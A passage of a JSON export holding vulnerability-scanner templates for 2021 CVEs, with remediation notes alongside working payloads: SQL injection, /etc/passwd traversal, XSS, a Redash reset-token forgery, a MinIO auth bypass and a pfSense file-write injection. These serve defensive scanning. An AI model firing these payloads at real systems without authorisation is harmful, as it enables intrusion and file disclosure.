charset=UTF-8\n\n username=test'+AND+(SELECT+4458+FROM+(SELECT(SLEEP(6)))JblN)+AND+'orQN'='orQN&password=test\n\n matchers:\n - type: dsl\n dsl:\n - 'duration>=6'\n - 'status_code == 200'\n - 'contains(header, \"text/html\")'\n - 'contains(body, \"status\\\":\\\"incorrect\\\"\")'\n condition: and\n# digest: 4a0a00473045022100e6f6b36eba8496c9a593169aab8d1c95a86ab766f8a7b6ff30f96d2d5d78e45b022054ee34ff5a00ffd01500719d1a15661146d35eb17a7224a0a24f38c5519de6bb:922c64590222798bb761d5b6d8e72950", "hash": "d9f999057e5dbb845321aa734acc3001", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083b5" }, "name": "CVE-2021-40960.yaml", "content": "id: CVE-2021-40960\n\ninfo:\n name: Galera WebTemplate 1.0 Directory Traversal\n author: daffainfo\n severity: critical\n description: Galera WebTemplate 1.0 is affected by a directory traversal vulnerability that could reveal information from /etc/passwd and /etc/shadow.\n impact: |\n An attacker can read, modify, or delete sensitive files on the server, potentially leading to unauthorized access, data leakage, or system compromise.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to fix the directory traversal vulnerability in Galera WebTemplate 1.0.\n reference:\n - http://www.omrylmz.com/galera-webtemplate-1-0-directory-traversal-vulnerability-cve-2021-40960/\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40960\n - http://www.galera.com.tr/\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-40960\n cwe-id: CWE-22\n epss-score: 0.00946\n epss-percentile: 0.81464\n cpe: cpe:2.3:a:galera:galera_webtemplate:1.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: galera\n product: galera_webtemplate\n tags: cve2021,cve,lfi,galera\n\nhttp:\n - method: GET\n path:\n - 
\"{{BaseURL}}/GallerySite/filesrc/fotoilan/388/middle//.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220187c8c2301f46d23bd67d918a519d449fe550a6f1a0f86fe94bc653a088fc06a022100ad5cb9e4d174b698f3ab2139e6a5208125620d52e6a8c126cd582398026d6652:922c64590222798bb761d5b6d8e72950", "hash": "6e060c42ca5e760f61f4bbcaf837a9de", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083b6" }, "name": "CVE-2021-40968.yaml", "content": "id: CVE-2021-40968\n\ninfo:\n name: Spotweb <= 1.5.1 - Cross Site Scripting\n author: theamanrawat\n severity: medium\n description: |\n Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the newpassword2 parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions.\n remediation: Fixed in version 1.5.2\n reference:\n - https://github.com/spotweb/spotweb/\n - https://github.com/spotweb/spotweb/issues/711\n - https://nvd.nist.gov/vuln/detail/CVE-2021-40968\n - https://github.com/spotweb/spotweb\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-40968\n cwe-id: CWE-79\n epss-score: 0.00152\n epss-percentile: 0.50482\n cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:*\n metadata:\n verified: \"true\"\n max-request: 1\n vendor: spotweb_project\n product: spotweb\n shodan-query: title:\"SpotWeb - overview\"\n tags: cve2021,cve,xss,spotweb,spotweb_project\n\nhttp:\n - raw:\n - |\n POST /install.php?page=4 HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n 
settingsform[newpassword2]=pdteam'+onclick='alert(document.domain)\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"onclick='alert(document.domain)\"\n - \"Spotweb\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402206dba6a431dc30930ad050e7f834b22acc257437f9ac33a3d996fcc702e3aa15802205f6714478f7cfa16218ab6510bd7d4dd9093ad29ce7722c5b0e8a4fee8aa45f6:922c64590222798bb761d5b6d8e72950", "hash": "b2fe278233e6405c5332514b0bef6885", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083b7" }, "name": "CVE-2021-40969.yaml", "content": "id: CVE-2021-40969\n\ninfo:\n name: Spotweb <= 1.5.1 - Cross Site Scripting (Reflected)\n author: theamanrawat\n severity: medium\n description: |\n Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the firstname parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, potentially leading to session hijacking, data theft, or other attacks.\n remediation: Fixed in version 1.5.2\n reference:\n - https://github.com/spotweb/spotweb/\n - https://github.com/spotweb/spotweb/issues/711\n - https://nvd.nist.gov/vuln/detail/CVE-2021-40969\n - https://github.com/spotweb/spotweb\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-40969\n cwe-id: CWE-79\n epss-score: 0.00152\n epss-percentile: 0.51305\n cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:*\n metadata:\n verified: \"true\"\n max-request: 1\n vendor: spotweb_project\n product: spotweb\n shodan-query: title:\"SpotWeb - overview\"\n tags: cve2021,cve,xss,spotweb,spotweb_project\n\nhttp:\n - raw:\n - |\n POST /install.php?page=4 HTTP/1.1\n Host: {{Hostname}}\n 
Content-Type: application/x-www-form-urlencoded\n\n settingsform[firstname]=pdteam'+onclick='alert(document.domain)\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"onclick='alert(document.domain)\"\n - \"Spotweb\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502207085af68079243c3f162206c08f5bfc2c11e35d92aa24107a9a989d42674176e022100c72473d3a42f86cc061bb8fec67780356ca1769c35fa52f444ff3316f6674779:922c64590222798bb761d5b6d8e72950", "hash": "33d7f944fa9a9797f250f79baa1a94c8", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083b8" }, "name": "CVE-2021-40970.yaml", "content": "id: CVE-2021-40970\n\ninfo:\n name: Spotweb <= 1.5.1 - Cross Site Scripting\n author: theamanrawat\n severity: medium\n description: |\n Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the username parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions.\n remediation: Fixed in version 1.5.2\n reference:\n - https://github.com/spotweb/spotweb/\n - https://github.com/spotweb/spotweb/issues/711\n - https://nvd.nist.gov/vuln/detail/CVE-2021-40970\n - https://github.com/spotweb/spotweb\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-40970\n cwe-id: CWE-79\n epss-score: 0.00152\n epss-percentile: 0.50482\n cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:*\n metadata:\n verified: \"true\"\n max-request: 1\n vendor: spotweb_project\n product: spotweb\n shodan-query: title:\"SpotWeb - overview\"\n tags: cve2021,cve,xss,spotweb,spotweb_project\n\nhttp:\n - raw:\n - |\n POST 
/install.php?page=1 HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n settingsform[username]=pdteam'+onclick='alert(document.domain)\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"onclick='alert(document.domain)\"\n - \"Spotweb\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100bacabdca74f9c9fbae5381ac0a8ef79f2c5702cb4c709e6194bfeb4213c503e902203c7a3b7376f619852ee754a987330645eee544784fe9acd88459eb72f7029e7f:922c64590222798bb761d5b6d8e72950", "hash": "48234b3242b0b9c2c01e6561336b48af", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083b9" }, "name": "CVE-2021-40971.yaml", "content": "id: CVE-2021-40971\n\ninfo:\n name: Spotweb <= 1.5.1 - Cross Site Scripting\n author: theamanrawat\n severity: medium\n description: |\n Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the newpassword1 parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.\n remediation: Fixed in version 1.5.2\n reference:\n - https://github.com/spotweb/spotweb/\n - https://github.com/spotweb/spotweb/issues/711\n - https://nvd.nist.gov/vuln/detail/CVE-2021-40971\n - https://github.com/spotweb/spotweb\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-40971\n cwe-id: CWE-79\n epss-score: 0.00152\n epss-percentile: 0.50482\n cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:*\n metadata:\n verified: \"true\"\n max-request: 1\n vendor: spotweb_project\n product: spotweb\n shodan-query: title:\"SpotWeb - overview\"\n tags: 
cve2021,cve,xss,spotweb,spotweb_project\n\nhttp:\n - raw:\n - |\n POST /install.php?page=4 HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n settingsform[newpassword1]=pdteam'+onclick='alert(document.domain)\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"onclick='alert(document.domain)\"\n - \"Spotweb\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 490a004630440220018fbd142442b644347ff23fb7ff5fae090cbd6180d4bae07df55618e3576c9002204f369d1032ff131cbf6c6bd4b8e1394b6b238418b68862884580300adb61e42b:922c64590222798bb761d5b6d8e72950", "hash": "ed06013e561013fccbfc617f7fbddd36", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083ba" }, "name": "CVE-2021-40972.yaml", "content": "id: CVE-2021-40972\n\ninfo:\n name: Spotweb <= 1.5.1 - Cross Site Scripting\n author: theamanrawat\n severity: medium\n description: |\n Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the mail parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.\n remediation: Fixed in version 1.5.2\n reference:\n - https://github.com/spotweb/spotweb/\n - https://github.com/spotweb/spotweb/issues/711\n - https://nvd.nist.gov/vuln/detail/CVE-2021-40972\n - https://github.com/spotweb/spotweb\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-40972\n cwe-id: CWE-79\n epss-score: 0.00152\n epss-percentile: 0.50482\n cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:*\n metadata:\n verified: \"true\"\n max-request: 1\n vendor: spotweb_project\n product: spotweb\n shodan-query: 
title:\"SpotWeb - overview\"\n tags: cve,cve2021,xss,spotweb,spotweb_project\n\nhttp:\n - raw:\n - |\n POST /install.php?page=4 HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n settingsform[mail]=pdteam'+onclick='alert(document.domain)\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"onclick='alert(document.domain)\"\n - \"Spotweb\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502202757edffd7b33049b4800f2a103e17130c6a711e551b6c494103f56e468676c2022100f5e21ea7300875d7fc8fddbc5308c309b8637309b4b14ffa1e252ef9e82955e7:922c64590222798bb761d5b6d8e72950", "hash": "053ab55beee5996fdcb2b19f18863fa7", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083bb" }, "name": "CVE-2021-40973.yaml", "content": "id: CVE-2021-40973\n\ninfo:\n name: Spotweb <= 1.5.1 - Cross Site Scripting\n author: theamanrawat\n severity: medium\n description: |\n Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the lastname parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: Fixed in version 1.5.2\n reference:\n - https://github.com/spotweb/spotweb/\n - https://github.com/spotweb/spotweb/issues/711\n - https://nvd.nist.gov/vuln/detail/CVE-2021-40973\n - https://github.com/spotweb/spotweb\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-40973\n cwe-id: CWE-79\n epss-score: 0.00152\n epss-percentile: 0.51404\n cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:*\n metadata:\n verified: \"true\"\n max-request: 1\n 
vendor: spotweb_project\n product: spotweb\n shodan-query: title:\"SpotWeb - overview\"\n tags: cve2021,cve,xss,spotweb,spotweb_project\n\nhttp:\n - raw:\n - |\n POST /install.php?page=4 HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n settingsform[lastname]=pdteam'+onclick='alert(document.domain)\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"onclick='alert(document.domain)\"\n - \"Spotweb\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022073aa701bbd4649f3814518c9b0fd5f4dae20221785bc65f0e16eb1352444cd05022066909db2e804aff7795a0f544ba36d182e0a3f49d67735b1434b4a5d05a298e0:922c64590222798bb761d5b6d8e72950", "hash": "f0d2184d29efe9abb8df3371d508159d", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083bc" }, "name": "CVE-2021-40978.yaml", "content": "id: CVE-2021-40978\n\ninfo:\n name: MKdocs 1.2.2 - Directory Traversal\n author: pikpikcu\n severity: high\n description: The MKdocs 1.2.2 built-in dev-server allows directory traversal using the port 8000, enabling remote exploitation to obtain sensitive information. 
Note the vendor has disputed the vulnerability (see references) because the dev server must be used in an unsafe way (namely public) to have this vulnerability exploited.\n impact: |\n An attacker can read or modify sensitive files on the server, potentially leading to unauthorized access, data leakage, or system compromise.\n remediation: |\n Upgrade MKdocs to version 1.2.3 or later to fix the directory traversal vulnerability.\n reference:\n - https://github.com/mkdocs/mkdocs/pull/2604\n - https://github.com/nisdn/CVE-2021-40978\n - https://nvd.nist.gov/vuln/detail/CVE-2021-40978\n - https://github.com/mkdocs/mkdocs\n - https://github.com/mkdocs/mkdocs/issues/2601\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-40978\n cwe-id: CWE-22\n epss-score: 0.03461\n epss-percentile: 0.90554\n cpe: cpe:2.3:a:mkdocs:mkdocs:1.2.2:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: mkdocs\n product: mkdocs\n tags: cve2021,cve,mkdocs,lfi\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:[x*]:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402200d3f8bfca9ff864b5abf41834779fd591efcbfccda6cd6d38a6edd71e4e6d97c022042f51441b7d5514ffd65f8467500374e8e43b594839c46aa9ca5cd6aa754e558:922c64590222798bb761d5b6d8e72950", "hash": "72ba191e530a4aef99504434cc79bb93", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083bd" }, "name": "CVE-2021-41174.yaml", "content": "id: CVE-2021-41174\n\ninfo:\n name: Grafana 8.0.0 <= v.8.2.2 - Angularjs Rendering Cross-Site Scripting\n author: pdteam\n severity: medium\n description: Grafana is an open-source platform for monitoring and observability. 
In affected versions if an attacker is able to convince a victim to visit a URL referencing a vulnerable page, arbitrary JavaScript content may be executed within the context of the victim's browser. The user visiting the malicious link must be unauthenticated and the link must be for a page that contains the login button in the menu bar. The url has to be crafted to exploit AngularJS rendering and contain the interpolation binding for AngularJS expressions.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the Grafana application.\n remediation: Upgrade to 8.2.3 or higher.\n reference:\n - https://github.com/grafana/grafana/security/advisories/GHSA-3j9m-hcv9-rpj8\n - https://nvd.nist.gov/vuln/detail/CVE-2021-41174\n - https://github.com/grafana/grafana/commit/3cb5214fa45eb5a571fd70d6c6edf0d729983f82\n - https://github.com/grafana/grafana/commit/31b78d51c693d828720a5b285107a50e6024c912\n - https://github.com/grafana/grafana/commit/fb85ed691290d211a5baa44d9a641ab137f0de88\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-41174\n cwe-id: CWE-79\n epss-score: 0.96194\n epss-percentile: 0.99478\n cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: grafana\n product: grafana\n shodan-query: title:\"Grafana\"\n tags: cve2021,cve,grafana,xss\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/dashboard/snapshot/%7B%7Bconstructor.constructor(%27alert(document.domain)%27)()%7D%7D?orgId=1\"\n\n skip-variables-check: true\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"Grafana\"\n - \"frontend_boot_js_done_time_seconds\"\n condition: and\n\n - type: regex\n regex:\n - '\"subTitle\":\"Grafana (v8\\.(?:(?:1|0)\\.[0-9]|2\\.[0-2]))'\n\n - type: status\n status:\n - 200\n\n 
extractors:\n - type: regex\n group: 1\n regex:\n - '\"subTitle\":\"Grafana ([a-z0-9.]+)'\n# digest: 4a0a004730450220733d9c9b0886194993d30c8b74ff942bf173ce98bc4618221bada7e54cc36574022100d4fe7afdb96b7f8631d53583b1d36f658e8156a630ce09b79dc52b60b73a80e6:922c64590222798bb761d5b6d8e72950", "hash": "8243451b58ed1f4f6186fc8960affcbe", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083be" }, "name": "CVE-2021-41192.yaml", "content": "id: CVE-2021-41192\n\ninfo:\n name: Redash Setup Configuration - Default Secrets Disclosure\n author: bananabr\n severity: medium\n description: Redash Setup Configuration is vulnerable to default secrets disclosure (Insecure Default Initialization of Resource). If an admin sets up Redash versions <=10.0 and prior without explicitly specifying the `REDASH_COOKIE_SECRET` or `REDASH_SECRET_KEY` environment variables, a default value is used for both that is the same across all installations. In such cases, the instance is vulnerable to attackers being able to forge sessions using the known default value.\n impact: |\n An attacker can gain unauthorized access to sensitive information and potentially compromise the Redash application.\n remediation: |\n Remove or update the default secrets in the Redash setup configuration file.\n reference:\n - https://hackerone.com/reports/1380121\n - https://github.com/getredash/redash/security/advisories/GHSA-g8xr-f424-h2rv\n - https://nvd.nist.gov/vuln/detail/CVE-2021-41192\n - https://github.com/getredash/redash/commit/ce60d20c4e3d1537581f2f70f1308fe77ab6a214\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N\n cvss-score: 6.5\n cve-id: CVE-2021-41192\n cwe-id: CWE-1188\n epss-score: 0.00805\n epss-percentile: 0.79795\n cpe: cpe:2.3:a:redash:redash:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: \"redash\"\n product: \"redash\"\n shodan-query: http.favicon.hash:698624197\n tags: cve2021,cve,hackerone,redash,auth-bypass\n\nhttp:\n - 
method: GET\n path:\n - \"{{BaseURL}}/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs\"\n - \"{{BaseURL}}/redash/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs\"\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"Enter your new password:\"\n - \"redash\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402202db04f9b255e97cf754ebc3deb27b4a54b33ce8bb5d8d77934815ccb21db9ca4022044559ab86eded575e036a3ddd5082711b30d9a6c7f8aa89fa03a1dc0ea16e380:922c64590222798bb761d5b6d8e72950", "hash": "349bcec6f5351a369f272b57baa49dd7", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083bf" }, "name": "CVE-2021-41266.yaml", "content": "id: CVE-2021-41266\n\ninfo:\n name: MinIO Operator Console Authentication Bypass\n author: alevsk\n severity: critical\n description: |\n MinIO Console is a graphical user interface for the MinIO Operator. MinIO itself is a multi-cloud object storage project. Affected versions are subject to an authentication bypass issue in the Operator Console when an external IDP is enabled.\n impact: |\n An attacker can bypass authentication and gain unauthorized access to the MinIO Operator Console.\n remediation: 'Update to v.0.12.3 or higher. 
Users unable to upgrade should add automountServiceAccountToken: false to the operator-console deployment in Kubernetes so no service account token will get mounted inside the pod, then disable the external identity provider authentication by unsetting the CONSOLE_IDP_URL, CONSOLE_IDP_CLIENT_ID, CONSOLE_IDP_SECRET and CONSOLE_IDP_CALLBACK environment variables and instead use the Kubernetes service account token.'\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2021-41266\n - https://github.com/minio/console/security/advisories/GHSA-4999-659w-mq36\n - https://github.com/minio/console/pull/1217\n - https://github.com/HimmelAward/Goby_POC\n - https://github.com/StarCrossPortal/scalpel\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-41266\n cwe-id: CWE-306\n epss-score: 0.05383\n epss-percentile: 0.92945\n cpe: cpe:2.3:a:min:minio_console:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: min\n product: minio_console\n tags: cve2021,cve,minio,min\n\nhttp:\n - raw:\n - |\n POST /api/v1/login/oauth2/auth HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n Content-Type: application/json\n\n {\"code\":\"test\",\"state\":\"test\"}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"sessionId\"\n\n - type: word\n part: header\n words:\n - \"token\"\n\n - type: status\n status:\n - 201\n - 200\n condition: or\n# digest: 4a0a00473045022100c35952887fbf6a00dac86888eb66ce0d229df442c79d7d92e1bf221def61f25a02207b2947243349965dd74e419e57d9012011b56c341d14cf8a6d54b43b094ff7f5:922c64590222798bb761d5b6d8e72950", "hash": "e722312f5228af47d6358d8c98003b78", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083c0" }, "name": "CVE-2021-41277.yaml", "content": "id: CVE-2021-41277\n\ninfo:\n name: Metabase - Local File Inclusion\n author: 0x_Akoko,DhiyaneshDK\n severity: high\n description: |\n Metabase is an open source data analytics platform. 
In affected versions a local file inclusion security issue has been discovered with the custom GeoJSON map (`admin->settings->maps->custom maps->add a map`) support and potential local file inclusion (including environment variables). URLs were not validated prior to being loaded.\n impact: |\n The vulnerability can result in unauthorized access to sensitive files or execution of arbitrary code on the affected system.\n remediation: |\n This issue is fixed in 0.40.5 and .40.5 and higher. If you are unable to upgrade immediately, you can mitigate this by including rules in your reverse proxy or load balancer or WAF to provide a validation filter before the application.\n reference:\n - https://github.com/metabase/metabase/security/advisories/GHSA-w73v-6p7p-fpfr\n - https://nvd.nist.gov/vuln/detail/CVE-2021-41277\n - https://twitter.com/90security/status/1461923313819832324\n - https://github.com/metabase/metabase/commit/042a36e49574c749f944e19cf80360fd3dc322f0\n - https://github.com/pen4uin/vulnerability-research-list\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-41277\n cwe-id: CWE-22,CWE-200\n epss-score: 0.95622\n epss-percentile: 0.99363\n cpe: cpe:2.3:a:metabase:metabase:0.40.0:-:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: metabase\n product: metabase\n shodan-query: http.title:\"Metabase\"\n fofa-query: app=\"Metabase\"\n tags: cve2021,cve,metabase,lfi\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/api/geojson?url=file:///etc/passwd\"\n - \"{{BaseURL}}/api/geojson?url=file:///c://windows/win.ini\"\n\n stop-at-first-match: true\n matchers-condition: or\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0\"\n\n - type: word\n part: body\n words:\n - \"bit app support\"\n - \"fonts\"\n - \"extensions\"\n condition: and\n# digest: 
490a004630440220350c5cacd0b231c91cdf48cda99ca1fc36a943c4e8b30342fabb9e5d0e1e7da50220450b72c0220ec3d7731717f613df423ce4f6468614feeb9c732013fb4702ba9b:922c64590222798bb761d5b6d8e72950", "hash": "981419a9d8df5bad19ff004b50679054", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083c1" }, "name": "CVE-2021-41282.yaml", "content": "id: CVE-2021-41282\n\ninfo:\n name: pfSense - Arbitrary File Write\n author: cckuailong\n severity: high\n description: |\n diag_routes.php in pfSense 2.5.2 allows sed data injection. Authenticated users are intended to be able to view data about the routes set in the firewall. The data is retrieved by executing the netstat utility, and then its output is parsed via the sed utility. Although the common protection mechanisms against command injection (e.g., the usage of the escapeshellarg function for the arguments) are used, it is still possible to inject sed-specific code and write an arbitrary file in an arbitrary location.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized modification of critical system files, potentially resulting in a complete compromise of the pfSense firewall.\n remediation: |\n Upgrade to pfSense CE software version 2.6.0 or later, or pfSense Plus software version 22.01 or later.\n reference:\n - https://www.shielder.it/advisories/pfsense-remote-command-execution/\n - https://www.rapid7.com/db/modules/exploit/unix/http/pfsense_diag_routes_webshell/\n - https://docs.netgate.com/downloads/pfSense-SA-22_02.webgui.asc\n - https://nvd.nist.gov/vuln/detail/CVE-2021-41282\n - https://docs.netgate.com/pfsense/en/latest/releases/22-01_2-6-0.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2021-41282\n cwe-id: CWE-74\n epss-score: 0.97305\n epss-percentile: 0.9986\n cpe: cpe:2.3:a:pfsense:pfsense:2.5.2:*:*:*:*:*:*:*\n metadata:\n max-request: 4\n vendor: pfsense\n product: pfsense\n tags: 
cve2021,cve,pfsense,rce,authenticated\n\nhttp:\n - raw:\n - |\n GET /index.php HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /index.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n __csrf_magic={{csrf_token}}&usernamefld={{username}}&passwordfld={{password}}&login=\n - |\n GET /diag_routes.php?isAjax=1&filter=.*/!d;};s/Destination/\\x3c\\x3fphp+var_dump(md5(\\x27CVE-2021-41282\\x27));unlink(__FILE__)\\x3b\\x3f\\x3e/;w+/usr/local/www/test.php%0a%23 HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /test.php HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - \"contains(body, 'c3959e8a43f1b39b0d1255961685a238')\"\n - \"status_code==200\"\n condition: and\n\n extractors:\n - type: regex\n name: csrf_token\n group: 1\n regex:\n - '(sid:[a-z0-9,;:]+)'\n internal: true\n part: body\n# digest: 4b0a00483046022100b22b55fdb5766d919894391f7177aae918603c8c010a1c3dc548f96ef4a45c4d022100db611b361bcb272bcc4771ae5352992d3c7c34007b9abb407fa3339df77adcb8:922c64590222798bb761d5b6d8e72950", "hash": "aec24f7dd87a1899a3b5ca3e5ce7f3b3", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083c2" }, "name": "CVE-2021-41291.yaml", "content": "id: CVE-2021-41291\n\ninfo:\n name: ECOA Building Automation System - Directory Traversal Content Disclosure\n author: gy741\n severity: high\n description: The ECOA BAS controller suffers from a directory traversal content disclosure vulnerability. 
